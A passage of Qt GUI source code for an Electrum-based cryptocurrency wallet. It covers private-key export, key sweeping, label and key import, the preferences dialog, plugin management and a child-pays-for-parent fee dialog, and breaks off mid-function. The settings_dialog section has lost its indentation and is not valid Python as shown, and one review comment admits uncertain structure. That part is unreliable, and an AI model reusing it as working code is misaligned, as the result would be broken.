    d.setMinimumSize(980, 300)
    vbox = QVBoxLayout(d)
    msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                          _("Exposing a single private key can compromise your entire wallet!"),
                          _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
    vbox.addWidget(QLabel(msg))
    e = QTextEdit()
    e.setReadOnly(True)
    vbox.addWidget(e)
    defaultname = 'electrum-private-keys.csv'
    select_msg = _('Select file to export your private keys to')
    hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
    vbox.addLayout(hbox)
    b = OkButton(d, _('Export'))
    b.setEnabled(False)
    vbox.addLayout(Buttons(CancelButton(d), b))
    # Shared state between the worker thread and the GUI callbacks.
    private_keys = {}
    addresses = self.wallet.get_addresses()
    done = False
    cancelled = False
    def privkeys_thread():
        # Worker: derive one key at a time, signalling progress.
        for addr in addresses:
            # NOTE(review): per-key delay — presumably to keep the GUI
            # responsive while keys are derived; confirm before changing.
            time.sleep(0.1)
            if done or cancelled:
                break
            privkey = self.wallet.export_private_key(addr, password)[0]
            private_keys[addr] = privkey
            self.computing_privkeys_signal.emit()
        if not cancelled:
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.emit()
    def show_privkeys():
        # GUI thread: render the finished key list and enable Export.
        s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
        e.setText(s)
        b.setEnabled(True)
        self.show_privkeys_signal.disconnect()
        nonlocal done
        done = True
    def on_dialog_closed(*args):
        # Stop the worker and detach signals if the user closes early.
        nonlocal done
        nonlocal cancelled
        if not done:
            cancelled = True
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.disconnect()
    self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
    self.show_privkeys_signal.connect(show_privkeys)
    d.finished.connect(on_dialog_closed)
    threading.Thread(target=privkeys_thread).start()
    if not d.exec_():
        done = True
        return
    filename = filename_e.text()
    if not filename:
        return
    try:
        self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
    except (IOError, os.error) as reason:
        txt = "\n".join([
            _("Electrum was unable to produce a private key-export."),
            str(reason)
        ])
        self.show_critical(txt, title=_("Unable to create csv"))
    except Exception as e:
        self.show_message(str(e))
        return
    self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
    """Write an address -> private-key mapping to *fileName*.

    If *is_csv* is true, write a CSV with header ``address,private_key``
    (addresses right-padded to 34 chars, as before); otherwise write the
    mapping as pretty-printed JSON.

    Fixes: open in plain write mode instead of "w+" (the file is never
    read back), pass newline='' for the CSV branch so the csv module
    controls line endings (avoids doubled \r on Windows), and write
    UTF-8 explicitly rather than the locale default.
    """
    if is_csv:
        with open(fileName, "w", newline='', encoding='utf-8') as f:
            writer = csv.writer(f)
            writer.writerow(["address", "private_key"])
            for addr, pk in pklist.items():
                writer.writerow(["%34s"%addr,pk])
    else:
        with open(fileName, "w", encoding='utf-8') as f:
            f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
    """Import wallet labels from a user-selected file via import_meta_gui."""
    def import_labels(path):
        def _validate(data):
            return data  # TODO
        def assign_labels(data):
            for key, value in data.items():
                self.wallet.set_label(key, value)
        import_meta(path, _validate, assign_labels)
    def on_import():
        # Trigger a GUI refresh once the labels are in.
        self.need_update.set()
    import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
    """Export wallet labels to a user-selected file via export_meta_gui."""
    export_meta_gui(self, _('labels'),
                    lambda filename: export_meta(self.wallet.labels, filename))
def sweep_key_dialog(self):
    """Dialog to sweep funds from raw private keys into a wallet address.

    Collects WIF keys and a destination address, validating both live as
    the user types, then prepares a max-value spend in the send tab.
    """
    d = WindowModalDialog(self, title=_('Sweep private keys'))
    d.setMinimumSize(600, 300)
    vbox = QVBoxLayout(d)
    hbox_top = QHBoxLayout()
    hbox_top.addWidget(QLabel(_("Enter private keys:")))
    hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    vbox.addLayout(hbox_top)
    keys_e = ScanQRTextEdit(allow_multi=True)
    keys_e.setTabChangesFocus(True)
    vbox.addWidget(keys_e)
    # Prefer an unused address; fall back for wallet types without
    # receiving addresses.
    addresses = self.wallet.get_unused_addresses()
    if not addresses:
        try:
            addresses = self.wallet.get_receiving_addresses()
        except AttributeError:
            addresses = self.wallet.get_addresses()
    h, address_e = address_field(addresses)
    vbox.addLayout(h)
    vbox.addStretch(1)
    button = OkButton(d, _('Sweep'))
    vbox.addLayout(Buttons(CancelButton(d), button))
    button.setEnabled(False)
    def get_address():
        # Returns the destination address, or None if invalid.
        addr = str(address_e.text()).strip()
        if bitcoin.is_address(addr):
            return addr
    def get_pk(*, raise_on_error=False):
        # Parses the pasted text into private keys.
        text = str(keys_e.toPlainText())
        return keystore.get_private_keys(text, raise_on_error=raise_on_error)
    def on_edit():
        # Enable Sweep only when both keys and address are valid.
        valid_privkeys = False
        try:
            valid_privkeys = get_pk(raise_on_error=True) is not None
        except Exception as e:
            button.setToolTip(f'{_("Error")}: {str(e)}')
        else:
            button.setToolTip('')
        button.setEnabled(get_address() is not None and valid_privkeys)
    on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
    keys_e.textChanged.connect(on_edit)
    address_e.textChanged.connect(on_edit)
    address_e.textChanged.connect(on_address)
    on_address(str(address_e.text()))
    if not d.exec_():
        return
    # user pressed "sweep"
    addr = get_address()
    try:
        self.wallet.check_address(addr)
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        raise
    try:
        coins, keypairs = sweep_preparations(get_pk(), self.network)
    except Exception as e: # FIXME too broad...
        self.show_message(str(e))
        return
    # Set up the send tab for a frozen, max-value sweep transaction.
    self.do_clear()
    self.tx_external_keypairs = keypairs
    self.spend_coins(coins)
    self.payto_e.setText(addr)
    self.spend_max()
    self.payto_e.setFrozen(True)
    self.amount_e.setFrozen(True)
    self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
    """Run a multi-line import dialog, feed the whitespace-separated
    entries to *func*, and report accepted/rejected inputs.

    *func* must return a (good_inputs, bad_inputs) pair where
    bad_inputs is a sequence of (key, error_message) tuples.
    """
    text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
    if not text:
        return
    keys = str(text).split()
    good_inputs, bad_inputs = func(keys)
    if good_inputs:
        shown = '\n'.join(good_inputs[:10])
        if len(good_inputs) > 10:
            shown += '\n...'
        self.show_message(_("The following addresses were added")
                          + f' ({len(good_inputs)}):\n' + shown)
    if bad_inputs:
        shown = "\n".join(f"{key[:10]}... ({err})" for key, err in bad_inputs[:10])
        if len(bad_inputs) > 10:
            shown += '\n...'
        self.show_error(_("The following inputs could not be imported")
                        + f' ({len(bad_inputs)}):\n' + shown)
    self.address_list.update()
    self.history_list.update()
def import_addresses(self):
    """Import watch-only addresses, if this wallet type supports it."""
    if not self.wallet.can_import_address():
        return
    self._do_import(_('Import addresses'),
                    _("Enter addresses") + ':',
                    self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
    """Import WIF private keys into the wallet.

    @protected prompts for the wallet password before running.
    """
    if not self.wallet.can_import_privkey():
        return
    header = QHBoxLayout()
    header.addWidget(QLabel(_("Enter private keys")+':'))
    header.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    self._do_import(_('Import private keys'), header,
                    lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
    """Show/hide the fiat amount fields and refresh all views after an
    exchange-rate configuration change."""
    fx_enabled = bool(self.fx and self.fx.is_enabled())
    self.fiat_send_e.setVisible(fx_enabled)
    self.fiat_receive_e.setVisible(fx_enabled)
    self.history_list.update()
    self.address_list.refresh_headers()
    self.address_list.update()
    self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
tabs.setObjectName("settings_tab")
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_xzc.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_xzc import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
    """Qt close handler: run clean_up() exactly once, then accept the close.

    :param event: the QCloseEvent delivered by Qt
    """
    # It seems in some rare cases this closeEvent() is called twice;
    # the cleaned_up flag makes teardown idempotent.
    if not self.cleaned_up:
        self.cleaned_up = True
        self.clean_up()
    event.accept()
def clean_up(self):
    """Release wallet/network resources before the window is destroyed.

    Called once from closeEvent(): stops the wallet thread, unregisters
    network callbacks, persists window geometry and console history,
    closes auxiliary windows and detaches from the GUI timer.
    """
    self.wallet.thread.stop()
    if self.network:
        self.network.unregister_callback(self.on_network)
        self.network.unregister_callback(self.on_quotes)
        self.network.unregister_callback(self.on_history)
        # NOTE(review): source indentation was lost on extraction; these two
        # lines are assumed to sit inside the `if self.network:` guard since
        # dash_net is an attribute of the network object — confirm upstream.
        self.wallet.protx_manager.clean_up()
        self.network.dash_net.unregister_callback(self.on_dash_net)
    # Remember whether the window was maximized; if not, store the exact geometry.
    self.config.set_key("is_maximized", self.isMaximized())
    if not self.isMaximized():
        g = self.geometry()
        self.wallet.storage.put("winpos-qt", [g.left(), g.top(),
                                              g.width(), g.height()])
    # Keep only the last 50 console entries (True -> flush config to disk now).
    self.config.set_key("console-history", self.console.history[-50:],
                        True)
    if self.qr_window:
        self.qr_window.close()
    self.close_wallet()
    self.gui_object.timer.timeout.disconnect(self.timer_actions)
    self.gui_object.close_window(self)
def plugins_dialog(self):
    """Show a modal dialog listing all plugins with enable-checkboxes and,
    where a plugin requires it, a lazily created settings widget."""
    self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
    plugins = self.gui_object.plugins
    vbox = QVBoxLayout(d)
    # plugins
    scroll = QScrollArea()
    scroll.setEnabled(True)
    scroll.setWidgetResizable(True)
    scroll.setMinimumSize(400, 250)
    vbox.addWidget(scroll)
    w = QWidget()
    scroll.setWidget(w)
    w.setMinimumHeight(plugins.count() * 35)
    grid = QGridLayout()
    grid.setColumnStretch(0, 1)
    w.setLayout(grid)
    settings_widgets = {}
    def enable_settings_widget(p, name, i):
        # Lazily create the per-plugin settings widget the first time the
        # plugin is enabled; afterwards only toggle its enabled state.
        widget = settings_widgets.get(name)
        if not widget and p and p.requires_settings():
            widget = settings_widgets[name] = p.settings_widget(d)
            grid.addWidget(widget, i, 1)
        if widget:
            widget.setEnabled(bool(p and p.is_enabled()))
    def do_toggle(cb, name, i):
        # Toggle the plugin; plugins.toggle() returns the instance when
        # enabled and a falsy value when disabled.
        p = plugins.toggle(name)
        cb.setChecked(bool(p))
        enable_settings_widget(p, name, i)
        run_hook('init_qt', self.gui_object)
    for i, descr in enumerate(plugins.descriptions.values()):
        full_name = descr['__name__']
        prefix, _separator, name = full_name.rpartition('.')
        p = plugins.get(name)
        # Keystore-registering plugins (hardware wallets) are managed elsewhere.
        if descr.get('registers_keystore'):
            continue
        try:
            cb = QCheckBox(descr['fullname'])
            plugin_is_loaded = p is not None
            # Enabled when the plugin could be loaded, or is loaded and the
            # user is allowed to disable it.
            cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                          or plugin_is_loaded and p.can_user_disable())
            cb.setEnabled(cb_enabled)
            cb.setChecked(plugin_is_loaded and p.is_enabled())
            grid.addWidget(cb, i, 0)
            enable_settings_widget(p, name, i)
            cb.clicked.connect(partial(do_toggle, cb, name, i))
            msg = descr['description']
            if descr.get('requires'):
                msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
            grid.addWidget(HelpButton(msg), i, 2)
        except Exception:
            # One broken plugin descriptor must not break the whole dialog.
            self.logger.exception(f"cannot display plugin {name}")
    grid.setRowStretch(len(plugins.descriptions.values()), 1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
def cpfp(self, parent_tx, new_tx):
    """Show the Child-Pays-For-Parent dialog and display the resulting child tx.

    :param parent_tx: unconfirmed transaction to accelerate
    :param new_tx: draft child transaction spending one of its outputs
    """
    total_size = parent_tx.estimated_size() + new_tx.estimated_size()
    parent_fee = self.wallet.get_tx_fee(parent_tx)
    if parent_fee is None:
        self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
        return
    d = WindowModalDialog(self, _('Child Pays for Parent'))
    vbox = QVBoxLayout(d)
    msg = (
        "A CPFP is a transaction that sends an unconfirmed output back to "
        "yourself, with a high fee. The goal is to have miners confirm "
        "the parent transaction in order to get the fee attached to the "
        "child transaction.")
    vbox.addWidget(WWLabel(_(msg)))
    msg2 = ("The proposed fee is computed using your "
            "fee/kB settings, applied to the total size of both child and "
            "parent transactions. After you broadcast a CPFP transaction, "
            "it is normal to see a new unconfirmed transaction in your history.")
    vbox.addWidget(WWLabel(_(msg2)))
    grid = QGridLayout()
    grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
    grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
    # The child can spend at most the full value of the output it consumes.
    max_fee = new_tx.output_value()
    grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
    grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
    output_amount = QLabel('')
    grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
    grid.addWidget(output_amount, 2, 1)
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # FIXME with dyn fees, without estimates, there are all kinds of crashes here
    combined_fee = QLabel('')
    combined_feerate = QLabel('')
    def on_fee_edit(x):
        # Recompute the derived output/fee/feerate labels whenever the
        # child-fee field changes.
        out_amt = max_fee - fee_e.get_amount()
        out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
        output_amount.setText(out_amt_str)
        comb_fee = parent_fee + fee_e.get_amount()
        comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
        combined_fee.setText(comb_fee_str)
        comb_feerate = comb_fee / total_size * 1000
        comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
        combined_feerate.setText(comb_feerate_str)
    fee_e.textChanged.connect(on_fee_edit)
    def get_child_fee_from_total_feerate(fee_per_kb):
        # Child fee = desired combined fee minus what the parent already pays,
        # clamped to at most max_fee and at least total_size satoshis.
        fee = fee_per_kb * total_size / 1000 - parent_fee
        fee = min(max_fee, fee)
        fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
        return fee
    suggested_feerate = self.config.fee_per_kb()
    if suggested_feerate is None:
        self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
        return
    fee = get_child_fee_from_total_feerate(suggested_feerate)
    fee_e.setAmount(fee)
    grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
    grid.addWidget(fee_e, 3, 1)
    def on_rate(dyn, pos, fee_rate):
